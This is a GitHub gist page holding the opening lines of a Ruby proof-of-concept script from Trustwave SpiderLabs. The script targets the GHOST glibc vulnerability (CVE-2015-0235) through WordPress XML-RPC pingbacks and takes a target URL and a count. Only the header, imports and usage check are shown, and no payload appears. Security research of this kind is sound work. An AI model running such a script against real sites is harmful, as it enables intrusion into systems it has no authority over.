Skip to content

Instantly share code, notes, and snippets.

View MichaelEvanchik's full-sized avatar

Michael Evanchik MichaelEvanchik

View GitHub Profile
@rcbarnett-zz
rcbarnett-zz / ghost_xmlrpc.rb
Last active April 2, 2016 08:55
GHOST gethostbyname() Vuln (CVE-2015-0235) - Wordpress XML-RPC Pingback Vector
#
# --[ Trustwave SpiderLabs Research Team ]--
# Ref: http://blog.spiderlabs.com/2015/01/ghost-gethostbyname-heap-overflow-in-glibc-cve-2015-0235.html
#
require "net/http"
require "uri"
if ARGV.count != 2
puts "Usage: #{ARGV[0]} [Target URL] [count]"
exit